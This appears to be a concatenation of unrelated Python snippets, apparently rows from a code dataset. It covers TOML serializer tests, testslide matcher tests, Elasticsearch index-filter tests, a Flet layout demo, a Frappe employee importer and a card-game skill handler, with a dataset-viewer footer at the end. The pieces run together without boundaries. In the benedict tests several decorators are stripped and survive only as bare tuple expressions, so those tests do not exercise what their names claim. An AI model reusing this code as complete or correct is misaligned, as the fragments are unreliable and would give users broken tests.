        self.assertEqual(d, {'a': 1, 'b': {'c': 3, 'd': 4}})
        d = IODict(j, format='toml')
        self.assertTrue(isinstance(d, dict))
        self.assertEqual(d, {'a': 1, 'b': {'c': 3, 'd': 4}})

    # NOTE(review): the two bare expressions below look like stripped
    # decorators -- presumably '@unittest.skipIf(tomllib_available, ...)' and
    # '@mock.patch("benedict.serializers.toml.toml_installed", False)'.
    # Restore them from the upstream test suite; as written they are no-ops
    # and this test will not exercise the "extra not installed" path.
    (tomllib_available, 'standard tomlib is available, exception will not be raised')
    ('benedict.serializers.toml.toml_installed', False)
    def test_from_toml_with_valid_data_but_toml_extra_not_installed(self):
        j = '\na = 1\n\n[b]\nc = 3\nd = 4\n'
        with self.assertRaises(ExtrasRequireModuleNotFoundError):
            _ = IODict.from_toml(j)
        with self.assertRaises(ExtrasRequireModuleNotFoundError):
            _ = IODict(j, format='toml')

    def test_from_toml_with_invalid_data(self):
        j = 'Lorem ipsum est in ea occaecat nisi officia.'
        with self.assertRaises(ValueError):
            IODict.from_toml(j)
        with self.assertRaises(ValueError):
            IODict(j, format='toml')

    def test_from_toml_with_valid_file_valid_content(self):
        filepath = self.input_path('valid-content.toml')
        d = IODict.from_toml(filepath)
        self.assertTrue(isinstance(d, dict))
        d = IODict(filepath, format='toml')
        self.assertTrue(isinstance(d, dict))
        # Format auto-detection from the .toml extension.
        d = IODict(filepath)
        self.assertTrue(isinstance(d, dict))

    def test_from_toml_with_valid_file_valid_content_invalid_format(self):
        # Files valid in other formats must not parse as TOML.
        filepath = self.input_path('valid-content.json')
        with self.assertRaises(ValueError):
            IODict.from_toml(filepath)
        filepath = self.input_path('valid-content.qs')
        with self.assertRaises(ValueError):
            IODict.from_toml(filepath)
        filepath = self.input_path('valid-content.xml')
        with self.assertRaises(ValueError):
            IODict.from_toml(filepath)
        filepath = self.input_path('valid-content.yml')
        with self.assertRaises(ValueError):
            IODict.from_toml(filepath)

    def test_from_toml_with_valid_file_invalid_content(self):
        filepath = self.input_path('invalid-content.toml')
        with self.assertRaises(ValueError):
            IODict.from_toml(filepath)
        with self.assertRaises(ValueError):
            IODict(filepath, format='toml')

    def test_from_toml_with_invalid_file(self):
        filepath = self.input_path('invalid-file.toml')
        with self.assertRaises(ValueError):
            IODict.from_toml(filepath)
        with self.assertRaises(ValueError):
            IODict(filepath, format='toml')

    def test_from_toml_with_valid_url_valid_content(self):
        url = self.input_url('valid-content.toml')
        d = IODict.from_toml(url)
        self.assertTrue(isinstance(d, dict))
        d = IODict(url, format='toml')
        self.assertTrue(isinstance(d, dict))
        d = IODict(url)
        self.assertTrue(isinstance(d, dict))

    def test_from_toml_with_valid_url_invalid_content(self):
        # FIX: the original line was a truncated string literal ('url = \'') --
        # a syntax error. Restored to a reachable page that is not TOML,
        # matching the upstream benedict test suite.
        url = 'https://github.com/fabiocaccamo/python-benedict'
        with self.assertRaises(ValueError):
            IODict.from_toml(url)
        with self.assertRaises(ValueError):
            IODict(url, format='toml')

    def test_from_toml_with_invalid_url(self):
        # FIX: same truncation as above; restored to a non-existent URL.
        url = 'https://github.com/fabiocaccamo/python-benedict-invalid'
        with self.assertRaises(ValueError):
            IODict.from_toml(url)
        with self.assertRaises(ValueError):
            IODict(url, format='toml')

    def test_to_toml(self):
        d = IODict({'x': 7, 'y': 8, 'z': 9, 'a': 1, 'b': 2, 'c': 3})
        s = d.to_toml()
        self.assertEqual(d, IODict.from_toml(s))

    def test_to_toml_file(self):
        d = IODict({'x': 7, 'y': 8, 'z': 9, 'a': 1, 'b': 2, 'c': 3})
        filepath = self.output_path('test_to_toml_file.toml')
        d.to_toml(filepath=filepath)
        self.assertFileExists(filepath)
        self.assertEqual(d, IODict.from_toml(filepath))

    # NOTE(review): another stripped '@mock.patch(...)' decorator -- restore
    # from upstream; without it this test will fail when the extra is present.
    ('benedict.serializers.toml.toml_installed', False)
    def test_to_toml_with_extra_not_installed(self):
        d = IODict({'a': 1, 'b': 2, 'c': 3})
        with self.assertRaises(ExtrasRequireModuleNotFoundError):
            _ = d.to_toml()
class TransferProgress(object):
    """Immutable snapshot of libgit2 transfer-progress counters.

    Copies each counter off the native progress object `tp` so the values
    survive after the underlying structure is freed/reused.
    """

    # Counter attributes mirrored verbatim from the source object.
    _FIELDS = (
        'total_objects',
        'indexed_objects',
        'received_objects',
        'local_objects',
        'total_deltas',
        'indexed_deltas',
        'received_bytes',
    )

    def __init__(self, tp):
        for field in self._FIELDS:
            setattr(self, field, getattr(tp, field))
class TestDicts(testslide.TestCase):
    """Behaviour of the dict-related testslide matchers."""

    def testAnyDict(self):
        # Matches any dict, empty or not; rejects every non-dict.
        self.assertEqual(testslide.matchers.AnyDict(), {})
        self.assertEqual(testslide.matchers.AnyDict(), {'a': 1})
        for non_dict in (69, [], None):
            self.assertNotEqual(testslide.matchers.AnyDict(), non_dict)

    def testNotEmptyDict(self):
        self.assertEqual(testslide.matchers.NotEmptyDict(), {'a': 1})
        for not_matching in ({}, 69, [], None):
            self.assertNotEqual(testslide.matchers.NotEmptyDict(), not_matching)

    def testEmptyDict(self):
        self.assertEqual(testslide.matchers.EmptyDict(), {})
        for not_matching in ({'a': 1}, 69, [], None):
            self.assertNotEqual(testslide.matchers.EmptyDict(), not_matching)

    def testDictSupersetOf(self):
        # Matches dicts that contain every given key/value pair.
        self.assertEqual(testslide.matchers.DictSupersetOf({'a': 'b', 'c': 1}), {'a': 'b', 'c': 1, 'd': 'e'})
        self.assertNotEqual(testslide.matchers.DictSupersetOf({'a': 'b', 'c': 1}), {'c': 1, 'd': 'e'})
        self.assertNotEqual(testslide.matchers.DictSupersetOf({}), 'DERP')
        # Non-dict arguments are rejected at construction time.
        for bad_argument in (10, 'derp', ['a', 'b', 'c']):
            with self.assertRaises(ValueError):
                testslide.matchers.DictSupersetOf(bad_argument)

    def testDictContainingKeys(self):
        # Matches dicts that contain at least the given keys.
        self.assertEqual(testslide.matchers.DictContainingKeys(['a', 'c']), {'a': 'b', 'c': 1, 'd': 'e'})
        self.assertNotEqual(testslide.matchers.DictContainingKeys(['a', 'b', 'c']), {'c': 1, 'd': 'e'})
        self.assertNotEqual(testslide.matchers.DictContainingKeys([1, 2]), 'DERP')
        # Non-list arguments are rejected at construction time.
        for bad_argument in (10, 'derp', {'a', 'b', 'c'}):
            with self.assertRaises(ValueError):
                testslide.matchers.DictContainingKeys(bad_argument)
class TestIndexListFilterAllocated(TestCase):
    """Argument validation and filtering behaviour of IndexList.filter_allocated."""

    def builder(self, key='2'):
        """Wire a mocked ES client from canned fixtures and build the IndexList."""
        client = Mock()
        client.info.return_value = get_es_ver()
        client.cat.indices.return_value = get_testvals(key, 'state')
        client.indices.get_settings.return_value = get_testvals(key, 'settings')
        client.indices.stats.return_value = get_testvals(key, 'stats')
        client.indices.exists_alias.return_value = False
        self.client = client
        self.ilo = IndexList(client)

    def test_missing_key(self):
        self.builder()
        with self.assertRaises(MissingArgument):
            self.ilo.filter_allocated(value='foo', allocation_type='invalid')

    def test_missing_value(self):
        self.builder()
        with self.assertRaises(MissingArgument):
            self.ilo.filter_allocated(key='tag', allocation_type='invalid')

    def test_invalid_allocation_type(self):
        self.builder()
        with self.assertRaises(ValueError):
            self.ilo.filter_allocated(key='tag', value='foo', allocation_type='invalid')

    def test_success(self):
        self.builder()
        self.ilo.filter_allocated(key='tag', value='foo', allocation_type='include')
        self.assertEqual(['index-2016.03.04'], self.ilo.indices)

    def test_invalid_tag(self):
        self.builder()
        # An unknown allocation key matches nothing, so no index is filtered out.
        self.ilo.filter_allocated(key='invalid', value='foo', allocation_type='include')
        self.assertEqual(['index-2016.03.03', 'index-2016.03.04'], sorted(self.ilo.indices))
def test_schedule_with_lp():
    """A LaunchPlan created with a FixedRate schedule must expose the
    equivalent schedule model (12 hours, kickoff input name)."""
    def double(a: int) -> int:
        return (a * 2)
    def quadruple(a: int) -> int:
        b = double(a=a)
        c = double(a=b)
        return c
    twelve_hours = _datetime.timedelta(hours=12)
    lp = LaunchPlan.create(
        'schedule_test',
        quadruple,
        schedule=FixedRate(twelve_hours, 'kickoff_input'),
    )
    expected = _schedule_models.Schedule(
        'kickoff_input',
        rate=_schedule_models.Schedule.FixedRate(12, _schedule_models.Schedule.FixedRateUnit.HOUR),
    )
    assert lp.schedule == expected
def main(page: Page):
    """Demo page: four coloured panes separated by vertical dividers of
    varying width/thickness/colour, laid out in a single full-height row."""
    panes = [
        Container(bgcolor=colors.ORANGE_300, alignment=alignment.center, expand=True),
        VerticalDivider(),
        Container(bgcolor=colors.BROWN_400, alignment=alignment.center, expand=True),
        VerticalDivider(width=1, color='white'),
        Container(bgcolor=colors.BLUE_300, alignment=alignment.center, expand=True),
        VerticalDivider(width=9, thickness=3),
        Container(bgcolor=colors.GREEN_300, alignment=alignment.center, expand=True),
    ]
    page.add(Row(panes, spacing=0, expand=True))
class KeyInstanceFlag(IntFlag):
    """Bit flags describing the state of a key instance."""

    NONE = 0

    # Activity bits.
    IS_ACTIVE = 0x001        # bit 0
    USER_SET_ACTIVE = 0x100  # bit 8

    # Allocation bits.
    IS_PAYMENT_REQUEST = 0x200  # bit 9
    IS_INVOICE = 0x400          # bit 10

    # Composite masks.
    CACHE_MASK = IS_ACTIVE
    ACTIVE_MASK = IS_ACTIVE | USER_SET_ACTIVE
    INACTIVE_MASK = ~IS_ACTIVE
    ALLOCATED_MASK = IS_PAYMENT_REQUEST | IS_INVOICE
def run():
    """Exercise every (ovlp_type, ovlp_with) overlap-tracking combination on
    cytosin and assert that exactly one root flip occurs, in cycle 2.

    For each combination a fresh geometry/calculator/optimizer is built, the
    optimization is run, and the tracked excited-state root is checked.
    """
    ovlp_types = 'wf tden nto_org nto'.split()
    ovlp_withs = 'adapt first previous'.split()
    for i, (ovlp_type, ovlp_with) in enumerate(it.product(ovlp_types, ovlp_withs)):
        print(highlight_text(f'i={i:02d}, ovlp_type={ovlp_type}, ovlp_with={ovlp_with}'))
        geom = geom_from_library('cytosin.xyz', coord_type='redund')
        calc = get_calc(ovlp_type, ovlp_with)
        geom.set_calculator(calc)
        opt = RFOptimizer(geom)
        opt.run()
        # Exactly one flip, in cycle 2; all other cycles stay unflipped.
        # (FIX: the original comprehension used 'flipped == False' and shadowed
        # the outer loop index 'i'.)
        assert calc.root_flips[2]
        assert all(not flipped for cycle, flipped in enumerate(calc.root_flips) if cycle != 2)
        assert calc.root == 2
        assert opt.cur_cycle == 4
        print()
def create_emp(emp):
    """Create and insert a Frappe Employee document from a Zenoti employee
    payload `emp` (expects 'id', 'code' and a 'personal_info' mapping)."""
    personal = emp['personal_info']
    doc = frappe.new_doc('Employee')
    doc.zenoti_employee_id = emp['id']
    doc.zenoti_employee_code = emp['code']
    # 'user_name' is optional in the Zenoti payload.
    doc.zenoti_employee_username = personal['user_name'] if 'user_name' in personal else ''
    doc.first_name = personal['first_name']
    doc.last_name = personal['last_name']
    doc.employee_name = personal['name']
    doc.gender = emp_gender_map[personal['gender']]
    # Placeholder dates: joined today, born 25 years ago.
    doc.date_of_joining = today()
    doc.date_of_birth = add_to_date(today(), years=-25)
    doc.insert()
class FerryFeeHandler(THBEventHandler):
    """Event handler for the FerryFee skill: after the skill owner deals
    damage to a player within FerryFee range, they may take one of the
    victim's cards."""
    interested = ['action_after']

    def handle(self, evt_type, act):
        """Fire the FerryFee effect after a qualifying Damage action.

        Guard order: skill owner check, victim-has-cards check, distance
        check, then a yes/no prompt; finally a card choice (random fallback).
        """
        if ((evt_type == 'action_after') and isinstance(act, Damage)):
            src = act.source
            tgt = act.target
            if (not (src and src.has_skill(FerryFee))):
                return act
            # Victim must have at least one card in hand, shown, or equipped.
            if (not (tgt.cards or tgt.showncards or tgt.equips)):
                return act
            g = self.game
            # Distance must be <= 0 as computed for the FerryFee virtual card.
            dist = LaunchCard.calc_distance(g, src, FerryFee(src))
            if (not (dist.get(tgt, 10000) <= 0)):
                return act
            # Ask the skill owner whether to trigger the effect.
            if g.user_input([src], ChooseOptionInputlet(self, (False, True))):
                g = self.game
                catnames = ('cards', 'showncards', 'equips')
                card = g.user_input([src], ChoosePeerCardInputlet(self, tgt, catnames))
                # No explicit pick (e.g. timeout): fall back to a random card.
                card = (card or random_choose_card(g, [tgt.cards, tgt.showncards, tgt.equips]))
                if (not card):
                    return act
                g.process_action(FerryFeeEffect(src, tgt, card))
        return act
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.